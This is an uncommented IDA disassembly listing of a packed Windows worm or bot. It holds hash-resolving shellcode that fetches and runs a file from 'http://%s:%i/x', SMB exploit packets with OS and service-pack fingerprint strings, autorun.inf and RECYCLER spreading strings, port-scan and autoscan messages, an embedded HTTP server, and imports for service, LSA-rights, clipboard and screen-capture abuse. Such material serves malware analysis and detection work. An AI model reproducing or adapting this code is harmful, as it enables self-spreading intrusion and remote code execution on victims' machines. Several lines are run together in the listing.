dd 0FE5EABFAh, 58927BC7h, 0D0D1C51Eh, 548AC01Eh, 0D6458864h
dd 0B8F9DCBAh, 0ACC1AF04h, 0FC10893Ch, 8208DCE5h, 6BFF5768h
dd 0C6EC7941h, 0FEEA73C6h, 0C1EA7396h, 0FC6BDDC6h, 5ABEFB3Ah
dd 0FE6DDDC4h, 6B8CDD68h, 68ECA947h, 6BDFE614h, 44447041h
dd 7475CDFFh, 424471F7h, 94BBF268h, 2E005C97h, 5C002E00h
dd 2E002E00h, 41005C00h, 48004F00h, 4D004C00h, 59005800h
db 0
byte_4127D9 db 0DEh, 0ADh, 0BEh ; DATA XREF: sub_409D61+4ED�o
; sub_409D61+51B�o ...
db 0EFh
byte_4127DD db 0BAh, 0DEh, 0C0h ; DATA XREF: sub_409D61+4FE�o
; sub_409D61+52C�o ...
dd 544950DEh
db 48h
byte_4127E5 db 0FEh, 0EDh, 0FAh ; DATA XREF: sub_409D61:loc_40A354�o
dd 4A4649CEh, 54554F55h, 57555045h, 574D584Bh, 48475558h
dd 4B45494Dh, 4E455943h, 50514142h, 44455A4Ch, 424F4F4Eh
dd 0BA574D47h, 0D5853DB3h, 0EB4AF81Bh, 435A4D62h, 484C5754h
dd 495759h, 9A000000h, 2000001h, 0
dd 2000000h, 5C000000h, 1000000h, 10h, 0
dword_412848 dd 5B000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_409D61+1F6�o
dword_412864 dd 4780800h dword_412868 dd 400800h, 0DE00FF18h, 700DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 5C000803h, 53565253h, 4356h
; ---------------------------------------------------------------------------
loc_4128A8: ; DATA XREF: sub_409D61+449�o
jmp loc_412978
; =============== S U B R O U T I N E =======================================
sub_4128AD proc near ; CODE XREF: UPX0:loc_412978�p
pop edi
call sub_412908
mov ebx, eax
push eax
push 0EC0E4E8Eh
call sub_41291F
xor ecx, ecx
mov cx, 6E6Fh
push ecx
push 6D6C7275h
push esp
call eax ; _acmdln
push eax
push 702F1A36h
call sub_41291F
xor ecx, ecx
push ecx
push ecx
lea esi, [edi]
push esi
lea esi, [edi+0Ch]
push esi
push ecx
call eax ; _acmdln
push ebx
push 0E8AFE98h
call sub_41291F
push ecx
push edi
call eax ; _acmdln
push ebx
push 0DB2D49B0h
call sub_41291F
xor ecx, ecx
dec ecx
push ecx
call eax ; _acmdln
sub_4128AD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412908 proc near ; CODE XREF: sub_4128AD+1�p
push ebp
push esi
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
mov eax, ebp
pop esi
pop ebp
retn
sub_412908 endp
; =============== S U B R O U T I N E =======================================
sub_41291F proc near ; CODE XREF: sub_4128AD+E�p
; sub_4128AD+28�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
mov ebp, [esp+10h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_412938: ; CODE XREF: sub_41291F+36�j
jecxz short loc_41296F
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_412943: ; CODE XREF: sub_41291F+30�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_412951
ror edi, 0Dh
add edi, eax
jmp short loc_412943
; ---------------------------------------------------------------------------
loc_412951: ; CODE XREF: sub_41291F+29�j
cmp edi, [esp+10h+arg_0]
jnz short loc_412938
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp loc_412971
; ---------------------------------------------------------------------------
loc_41296F: ; CODE XREF: sub_41291F:loc_412938�j
xor eax, eax
loc_412971: ; CODE XREF: sub_41291F+4B�j
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41291F endp
; ---------------------------------------------------------------------------
loc_412978: ; CODE XREF: UPX0:loc_4128A8�j
call sub_4128AD
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 0Dh dup(0)
dword_4129B4 dd 1F1CB0h dword_4129B8 dd 1F1CB0h dword_4129BC dd 20408h, 1 dword_4129C4 dd 1001361h dword_4129C8 dd 1001361h dword_4129CC dd 20408h, 2, 6F88F727h, 6F8916E2h, 20408h, 3
; DATA XREF: sub_409D61:loc_40A302�o
dword_4129E4 dd 6F88F807h dword_4129E8 dd 6F8917C2h dword_4129EC dd 20408h, 4 dword_4129F4 dd 100129Eh dword_4129F8 dd 100129Eh dword_4129FC dd 20408h, 5 dword_412A04 dd 71BF21A2h dword_412A08 dd 71BF21A2h dword_412A0C dd 20408h, 6 dword_412A14 dd 71BF3969h dword_412A18 dd 71BF3969h dword_412A1C dd 20408h, 8Fh dup(0)dword_412C5C dd 70747468h, 252F2F3Ah, 69253A73h, 782Fh, 0dword_412C70 dd 78652E78h, 65hunk_412C78 db 81h ; ; DATA XREF: sub_40A587+74�o
db 2 dup(0), 44h
aCkfdenecfdef_0 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedca_0 db ' EKEDFEEIEDCACACACACACACACACACAAA',0
dd 0
dword_412CC4 dd 2F000000h, 424D53FFh, 72h, 4 dup(0) dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h
dword_412CF8 dd 48000000h, 424D53FFh, 73h, 4 dup(0) dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 6E000000h, 79700074h, 626D73h
dd 0Bh dup(0)
dword_412D70 dd 626D6153h, 2A2061h, 0dword_412D7C dd 646E6957h, 2073776Fh, 312E35h, 0dword_412D8C dd 646E6957h, 2073776Fh, 302E35h, 0aWindows2000Lan db 'Windows 2000 LAN Manager*',0 ; DATA XREF: sub_40A587+1DF�o
align 4
dd 0
aNtLanManager_ db 'NT LAN Manager *.*',0 ; DATA XREF: sub_40A587+1C5�o
align 10h
dd 0
aServicePack2 db '*Service Pack 2*',0 ; DATA XREF: sub_40A587+1A3�o
align 4
aServicePack1 db '*Service Pack 1*',0 ; DATA XREF: sub_40A587+185�o
align 4
aWindowsServer2 db 'Windows Server 2003 *.*',0 ; DATA XREF: sub_40A587+16E�o
align 8
aS_0: ; DATA XREF: UPX0:0040B06B�o
unicode 0, <s>,0
dd 2 dup(0)
dd 73000000h, 76737276h, 632E63h, 6 dup(0)
dword_412E48 dd 1BDh ; sub_401B8B+575�o ...
off_412E4C dd offset sub_4012DA ; DATA XREF: UPX0:0040B0D4�r
dword_412E50 dd 1 dd 6Dh, 2 dup(0)
dd 6D000000h, 6C717373h, 632Eh, 6 dup(0)
dd 599h, 40122Bh, 1, 18h dup(0)
dword_412EF0 dd 252E7325h, 73252E73h, 73252Eh, 0dword_412F00 dd 78h ; sub_40A87B+B1�o ...
dword_412F04 dd 3430032Dh, 74746802h, 2036470h, 6553202Dh, 72657672h
; DATA XREF: sub_40A9CB+96�o
dd 61747320h, 64657472h, 328202Ch, 68023330h, 3A707474h
dd 73252F2Fh, 2F69253Ah, 29020378h, 3 dup(0)
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_40AD1A+17B�o
align 10h
aSDScanThreadDS db '-%s:%d, Scan thread: %d, Sub-thread: %d.',0 ; DATA XREF: sub_40AD1A+DE�o
align 4
dd 2 dup(0)
aFailedToInitia db 'Failed to initialize critical section, error: <%d>',0
; DATA XREF: sub_40AD1A+9C�o
align 4
dd 3 dup(0)
aPortscanSDOpen db 'Portscan: %s:%d open.',0 ; DATA XREF: UPX0:0040B031�o
align 10h
aSAutoscanStart db '%s -AutoScan- started on %s:%d with a delay of %d seconds for %d '
; DATA XREF: sub_40B179+D2�o
db 'minutes using %d threads.',0
align 4
dd 5 dup(0)
aS_2: ; DATA XREF: sub_40B179+35�o
unicode 0, <s>,0
; ---------------------------------------------------------------------------
loc_413084: ; DATA XREF: sub_40B30A+E8�o
jmp short loc_413088
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: UPX0:loc_413088�p
jmp short loc_41308D
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: UPX0:loc_413084�j
call loc_413086
loc_41308D: ; CODE XREF: UPX0:loc_413086�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 66h, 0B9h
word_413092 dw 0FFFFh ; DATA XREF: sub_40B30A+F0�w
db 80h, 73h, 0Eh
byte_413097 db 0FFh ; DATA XREF: sub_40B30A+F7�w
dd 0F9E243h
; ---------------------------------------------------------------------------
loc_41309C: ; DATA XREF: sub_40B30A+C6�o
jmp short loc_4130A0
; ---------------------------------------------------------------------------
loc_41309E: ; CODE XREF: UPX0:loc_4130A0�p
jmp short loc_4130A5
; ---------------------------------------------------------------------------
loc_4130A0: ; CODE XREF: UPX0:loc_41309C�j
call loc_41309E
loc_4130A5: ; CODE XREF: UPX0:loc_41309E�j
pop ebx
xor ecx, ecx
; ---------------------------------------------------------------------------
db 0B1h
byte_4130A9 db 0FFh ; DATA XREF: sub_40B30A+CE�w
dw 7380h
db 0Ch
byte_4130AD db 0FFh ; DATA XREF: sub_40B30A+D4�w
dw 0E243h
dd 0F9h, 2 dup(0)
dword_4130BC dd 7475615Ch, 6E75726Fh, 666E692Eh, 0aShellOpenDefau db 0Dh,0Ah ; DATA XREF: sub_40B47F+1E6�o
db 'shell\open\default=1',0
align 8
aIconSystemroot db 0Dh,0Ah ; DATA XREF: sub_40B47F+1CE�o
db 'icon=%SystemRoot%\system32\SHELL32.dll,4',0Dh,0Ah
db 'action=Open folder to view files',0Dh,0Ah
db 'shell\open=Open',0Dh,0Ah
db 'shell\open\command=',0
align 4
dd 6 dup(0)
aAutorunOpen db '[autorun]',0Dh,0Ah ; DATA XREF: sub_40B47F+1B5�o
db 'open=',0
align 4
aAutorunme_exe db 'autorunme.exe',0 ; DATA XREF: sub_40B47F+149�o
align 4
a_shellclassinf db '[.ShellClassInfo]',0Dh,0Ah ; DATA XREF: sub_40B47F+105�o
db 'CLSID={645FF040-5081-101B-9F08-00AA002F954E}',0
dd 3 dup(0)
aDesktop_ini db '\Desktop.ini',0 ; DATA XREF: sub_40B47F+CF�o
align 4
aS1621243447650 db '\S-1-6-21-2434476501-1644491937-600003330-1213',0
; DATA XREF: sub_40B47F+96�o
align 4
dd 2 dup(0)
aRecycler db '\RECYCLER',0 ; DATA XREF: sub_40B47F+51�o
align 4
dword_413238 dd 3430033Ah, 62737502h, 203A0203h, 65666E69h, 64657463h
; DATA XREF: UPX0:0040B857�o
dd 69726420h, 33A6576h, 25023330h, 20373h, 2 dup(0)
dword_413264 dd 4000500h, 7868746Bh, 0dword_413270 dd 3430032Dh, 726F7702h, 6469726Dh, 66742E65h, 3647074h
; DATA XREF: UPX0:0040BB84�o
dd 65202D02h, 6F6C7078h, 64657469h, 33300320h, 3732502h
dd 3282002h, 25023330h, 29020373h, 63757320h, 66736563h
dd 796C6C75h, 4 dup(0)
dword_4132C0 dd 6272h aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40BC82+311�o
db 'Server: private',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dd 0Ch dup(0)
aGet db 'GET ',0 ; DATA XREF: sub_40BC82+2A0�o
align 10h
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40BC82+158�o
align 4
aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40BC82+13F�o
align 10h
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40BC82+CC�o
align 10h
dword_413430 dd 1 dd 9Bh dup(0)
dword_4136A0 dd 7 dup(0) ; UPX0:00409C18�o
dword_4136BC dd 4 dup(0) ; UPX0:004068EB�o ...
dword_4136CC dd 7 dup(0) ; UPX0:00409C13�o
dword_4136E8 dd 40h dup(0) dword_4137E8 dd 4 dup(0) ; UPX0:004068F6�o ...
dword_4137F8 dd 7 dup(0) ; UPX0:00409C02�o
dword_413814 dd 0 ; UPX0:00403AE4�w ...
dword_413818 dd 9 dup(0) ; sub_409D61+3D6�o
dword_41383C dd 9 dup(0) ; UPX0:00409C0E�o
dword_413860 dd 0 ; UPX0:loc_4037A2�o ...
dd 100h, 0Dh dup(0)
dword_41389C dd 0 dd 4 dup(0)
dword_4138B0 dd 0 ; sub_40A9CB+6E�w
dword_4138B4 dd 0 dword_4138B8 dd 7 dup(0) ; UPX0:00409C09�o
dword_4138D4 dd 0 ; UPX0:00403BA1�r ...
dd 9 dup(0)
byte_4138FC db 0 ; DATA XREF: sub_401B8B+246�w
; sub_401B8B:loc_401E01�w ...
align 10h
dword_413900 dd 0 dd 1Fh dup(0)
byte_413980 db 0 ; DATA XREF: sub_4042A3+ED�o
; sub_406776+13�o ...
align 8
byte_413988 db 0 ; DATA XREF: sub_404D74+10�o
; sub_404D74+F4�w
align 4
dd 4 dup(0)
byte_41399C db 0 ; DATA XREF: sub_404EB9+20�o
; sub_404EB9+91�w
align 10h
dd 4 dup(0)
dword_4139B0 dd 5 dup(0) dword_4139C4 dd 5 dup(0) dword_4139D8 dd 0 byte_4139DC db 0 ; DATA XREF: sub_404CEA+B�o
; sub_404CEA+5F�w
align 10h
dd 4 dup(0)
byte_4139F0 db 0 ; DATA XREF: sub_404C0F+5�o
; sub_404C0F+2D�w ...
align 4
dd 4 dup(0)
byte_413A04 db 0 ; DATA XREF: sub_404C66+A�o
; sub_404C66+2B�r
align 4
dd 4 dup(0)
dword_413A18 dd 0 ; sub_4042A3+AD�w ...
dword_413A1C dd 5 dup(0) dword_413A30 dd 0 ; sub_403EB0+2E�r ...
dd 3 dup(0)
db 2 dup(0)
dword_413A42 dd 0 ; sub_403FAF+1�o ...
align 4
dd 3 dup(0)
dword_413A54 dd 0 ; sub_403FFF+39�r
dd 88h dup(0)
dword_413C78 dd 4 dup(0) ; sub_403F2A+4E�o ...
db 2 dup(0)
word_413C8A dw 0 ; DATA XREF: sub_403FAF+36�o
dd 21h dup(0)
dword_413D10 dd 77F16E6Fh ; resolved to->GDI32.DeleteDC ; sub_4053A3+6C6�r
dword_413D14 dd 7C864230h ; resolved to->KERNEL32.Module32Firstdword_413D18 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_4053A3+9F7�w ...
dword_413D1C dd 0 ; sub_4053A3+C3C�r
dword_413D20 dd 0 ; sub_4053A3+C0C�r
dword_413D24 dd 77F15B80h ; resolved to->GDI32.SelectObject ; sub_4053A3+6B6�r
dword_413D28 dd 0 ; sub_4053A3+C34�r
dword_413D2C dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_4053A3+585�r ...
dword_413D30 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceA ; sub_4053A3+58D�r ...
dword_413D34 dd 77DFCF32h ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_4053A3+5B5�r
dword_413D38 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_413D3C dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_4053A3+DF�r
dword_413D40 dd 0 ; sub_4053A3+BFF�r
dword_413D44 dd 77DE1C0Fh ; resolved to->ADVAPI32.LsaOpenPolicy ; sub_4053A3+455�r
dword_413D48 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4053A3+5A5�r ...
dword_413D4C dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_4053A3+AB2�r
dword_413D50 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId ; sub_4053A3+280�r
dword_413D54 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4053A3+362�r ...
dword_413D58 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_4053A3+A52�w ...
dword_413D5C dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4053A3+B3�w ...
dword_413D60 dd 0 ; resolved to->WININET.InternetReadFile ; sub_4053A3+A6C�w ...
dword_413D64 dd 77E37779h ; resolved to->ADVAPI32.LockServiceDatabase ; sub_4053A3+5C5�r ...
dword_413D68 dd 77DECF4Ah ; resolved to->ADVAPI32.RegEnumValueA ; sub_4053A3+382�r ...
dword_413D6C dd 71AC0979h ; resolved to->WS2_32.WSAAsyncSelect ; sub_4053A3+8B8�r
dword_413D70 dd 7C863F58h ; resolved to->KERNEL32.Process32Next ; sub_4053A3+D7�r
dword_413D74 dd 0 ; resolved to->IPHLPAPI.IcmpSendEchodword_413D78 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_4053A3+C91�r ...
dword_413D7C dd 0 ; resolved to->WININET.FtpGetFileAdword_413D80 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4053A3+A6�w ...
dword_413D84 dd 0 ; sub_4053A3+EE7�r ...
dword_413D88 dd 77F1AC3Dh ; resolved to->GDI32.GetDIBColorTable ; sub_4053A3+6AE�r
dword_413D8C dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_40AAF2+20�r
dword_413D90 dd 0 ; sub_4053A3+C2C�r
dword_413D94 dd 77DE1CDCh ; resolved to->ADVAPI32.LsaClose ; sub_4053A3+48A�r
dword_413D98 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4053A3+93C�r
dword_413D9C dd 0 dword_413DA0 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_4053A3+9EA�w ...
dword_413DA4 dd 7E45A045h ; resolved to->USER32.ExitWindowsExdword_413DA8 dd 0 ; sub_4053A3+C14�r
dword_413DAC dd 77DEB635h ; resolved to->ADVAPI32.ControlService ; sub_4053A3+595�r
dword_413DB0 dd 77DD7B3Dh ; resolved to->ADVAPI32.OpenThreadToken ; sub_4053A3+3C7�r ...
dword_413DB4 dd 77E37311h ; resolved to->ADVAPI32.DeleteService ; sub_4053A3+59D�r ...
dword_413DB8 dd 71AC0B50h ; resolved to->WS2_32.getpeernamedword_413DBC dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; UPX0:004035C6�r ...
dword_413DC0 dd 77F16C0Ah ; resolved to->GDI32.DeleteObjectdword_413DC4 dd 0 ; sub_4053A3+C44�r
dword_413DC8 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_4053A3+36A�r ...
dword_413DCC dd 77DFC8C1h ; resolved to->ADVAPI32.RegEnumKeyExA ; sub_4079A2+8A�r ...
dword_413DD0 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_4053A3+E7�r
dword_413DD4 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatus ; sub_40814F+5A�r ...
dword_413DD8 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_4053A3+DD8�r
dword_413DDC dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_4053A3+70E�w ...
dword_413DE0 dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_4053A3+A96�r
dword_413DE4 dd 7E455D1Fh ; resolved to->USER32.CloseWindow ; sub_4053A3+1CF�r
dword_413DE8 dd 0 ; sub_4053A3+C1C�r
dword_413DEC dd 77E379F9h ; resolved to->ADVAPI32.QueryServiceLockStatusA ; sub_4053A3+5CD�r ...
dword_413DF0 dd 0 ; sub_4053A3+E73�r ...
dword_413DF4 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_4053A3+B34�r
dword_413DF8 dd 77DFC123h ; resolved to->ADVAPI32.RegDeleteKeyA ; sub_4053A3+372�r ...
dword_413DFC dd 0 dword_413E00 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_4053A3+8D0�r
dword_413E04 dd 0 ; resolved to->WININET.InternetOpenA ; sub_4053A3+A79�r
dword_413E08 dd 0 ; resolved to->SHLWAPI.PathRemoveFileSpecA ; sub_4053A3+F40�w ...
dword_413E0C dd 7E41B933h ; resolved to->USER32.IsWindow ; sub_4053A3+1EC�r
dword_413E10 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; UPX0:00405359�r ...
dword_413E14 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_4053A3+783�w ...
dword_413E18 dd 71AB4489h ; resolved to->WS2_32.WSAIoctl ; sub_4053A3+8C4�r
dword_413E1C dd 77DFC1B5h ; resolved to->ADVAPI32.RegQueryInfoKeyA ; sub_407BCA+7E�r
dword_413E20 dd 7E41E77Ch ; resolved to->USER32.GetWindowInfo ; sub_4053A3+278�r
dword_413E24 dd 7E41D8A4h ; resolved to->USER32.ShowWindow ; sub_4053A3+288�r
dword_413E28 dd 0 ; sub_4053A3+AE1�w ...
dword_413E2C dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_4053A3+352�r ...
dword_413E30 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4053A3+9A4�r ...
dword_413E34 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_4053A3+3DC�r ...
dword_413E38 dd 77DEAF3Fh ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_4053A3+5AD�r ...
dword_413E3C dd 0 dword_413E40 dd 0 ; sub_4053A3+E6B�r ...
dword_413E44 dd 0 ; sub_4053A3+EF4�r ...
dword_413E48 dd 77DF9309h ; resolved to->ADVAPI32.LsaLookupNames2 ; sub_4053A3+46A�r
dword_413E4C dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_4053A3+A8E�r
dword_413E50 dd 7E430237h ; resolved to->USER32.OpenClipboard ; sub_4053A3+1FC�r
dword_413E54 dd 7E41C465h ; resolved to->USER32.IsWindowVisible ; sub_4053A3+290�r
dword_413E58 dd 0 ; resolved to->IPHLPAPI.GetIfTable ; sub_4053A3+D17�r
dword_413E5C dd 0 ; resolved to->WININET.InternetConnectA ; sub_4053A3+A9E�r
dword_413E60 dd 71AB2D0Fh ; resolved to->WS2_32.recvfrom ; sub_4053A3+95C�r
dword_413E64 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4053A3+37A�r ...
dword_413E68 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4053A3+984�r
dword_413E6C dd 0 ; resolved to->IPHLPAPI.GetTcpTable ; sub_4053A3+D23�r
dword_413E70 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_4053A3+3D4�r ...
dword_413E74 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_4053A3+96C�r ...
dword_413E78 dd 77F1B221h ; resolved to->GDI32.CreateDCA ; sub_4053A3+689�r
dword_413E7C dd 77DF061Ah ; resolved to->ADVAPI32.LsaNtStatusToWinErrordword_413E80 dd 7E430D7Ah ; resolved to->USER32.GetClipboardData ; sub_4053A3+204�r
dword_413E84 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_4053A3+578�r ...
dword_413E88 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_413E8C dd 77E1A8EAh ; resolved to->ADVAPI32.LsaEnumerateAccountsWithUserRight ; sub_4053A3+462�r
dword_413E90 dd 0 ; sub_4053A3+EFC�r ...
dword_413E94 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_4053A3+930�r ...
dword_413E98 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4053A3+7AA�w ...
dword_413E9C dd 7C863DE5h ; resolved to->KERNEL32.Process32First ; sub_4053A3+CF�r
dword_413EA0 dd 77E1A9A1h ; resolved to->ADVAPI32.LsaAddAccountRights ; sub_4053A3+472�r
dword_413EA4 dd 77F15A7Ah ; resolved to->GDI32.GetDeviceCaps ; sub_4053A3+6A6�r
dword_413EA8 dd 7E42DE87h ; resolved to->USER32.FindWindowA ; sub_405186+AA�r ...
dword_413EAC dd 0 dword_413EB0 dd 71AB50C8h ; resolved to->WS2_32.gethostname ; sub_4053A3+860�w ...
dword_413EB4 dd 77E1AA41h ; resolved to->ADVAPI32.LsaRemoveAccountRights ; sub_4053A3+47A�r
dword_413EB8 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerA ; sub_4053A3+5E5�r ...
dword_413EBC dd 77E37B19h ; resolved to->ADVAPI32.UnlockServiceDatabase ; sub_4053A3+5DD�r ...
dword_413EC0 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_4053A3+7F8�w ...
dword_413EC4 dd 0 ; sub_4053A3+E7B�r ...
dword_413EC8 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_4053A3+C7�r
dword_413ECC dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_4053A3+35A�r ...
dword_413ED0 dd 77DE2BB6h ; resolved to->ADVAPI32.LsaFreeMemory ; sub_4053A3+482�r
dword_413ED4 dd 71AB88D3h ; resolved to->WS2_32.listen ; sub_4053A3+974�r
dword_413ED8 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_4053A3+964�r
dword_413EDC dd 0 ; resolved to->WININET.InternetCloseHandle ; UPX0:004032A7�r ...
dword_413EE0 dd 0 dword_413EE4 dd 0 ; sub_4053A3+E56�r ...
dword_413EE8 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4053A3+918�r ...
dword_413EEC dd 77F19219h ; resolved to->GDI32.CreateDIBSection ; sub_4053A3+696�r
dword_413EF0 dd 77F16F89h ; resolved to->GDI32.BitBlt ; sub_4053A3+6BE�r
dword_413EF4 dd 77F15FF0h ; resolved to->GDI32.CreateCompatibleDC ; sub_4053A3+69E�r
dword_413EF8 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4053A3+7DE�w ...
dword_413EFC dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; sub_4053A3+C0�w
dword_413F00 dd 7E430225h ; resolved to->USER32.CloseClipboard ; sub_4053A3+20C�r
dword_413F04 dd 0 ; sub_4053A3+C4C�r
dword_413F08 dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_4053A3+1DC�r
dword_413F0C dd 0 dword_413F10 dd 0 ; resolved to->IPHLPAPI.GetUdpTabledword_413F14 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_4053A3+EF�r
dword_413F18 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_4053A3+94C�r
dword_413F1C dd 0 ; sub_4053A3+D93�r
dword_413F20 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_408812+74�r ...
dword_413F24 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceA ; sub_40829C+5C�r
dword_413F28 dd 0 ; resolved to->WININET.FtpPutFileAdword_413F2C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_4053A3+345�r ...
dword_413F30 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_413F34 dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_4053A3+D0F�r ...
dword_413F38 dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_4053A3+D02�r ...
dword_413F3C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4053A3+769�w ...
dword_413F40 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4042A3+4F�r ...
dword_413F44 dd 0 ; sub_4053A3+E63�r ...
dword_413F48 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; UPX0:00403A1D�r ...
dword_413F4C dd 0 ; sub_4053A3+C24�r
dword_413F50 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_4053A3+97C�r
dword_413F54 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_4053A3+8A1�w
dword_413F58 dd 7E41CD97h ; resolved to->USER32.EnumWindows ; sub_4053A3+26B�r
dword_413F5C dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40443D+2A�r ...
dword_413F60 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_4053A3+8F4�r ...
dword_413F64 dd 0 ; sub_4053A3+D8B�r
dword_413F68 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_4053A3+8AC�r
dword_413F6C dd 0 ; sub_4053A3+D7E�r
dword_413F70 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorMode ; sub_4053A3+31�w ...
dword_413F74 dd 7E41DAEAh ; resolved to->USER32.DestroyWindow ; sub_4053A3+1F4�r
dword_413F78 dd 77DDDA7Fh ; resolved to->ADVAPI32.ImpersonateLoggedOnUser ; sub_4053A3+5BD�r ...
dword_413F7C dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_4053A3+5D5�r ...
dword_413F80 dd 7E42F420h ; resolved to->USER32.GetClassNameAdword_413F84 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_4053A3+B41�r
dword_413F88 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA ; sub_4053A3+523�w
dword_413F8C dd 7C8217EAh ; resolved to->KERNEL32.SearchPathA ; sub_4053A3+F7�r
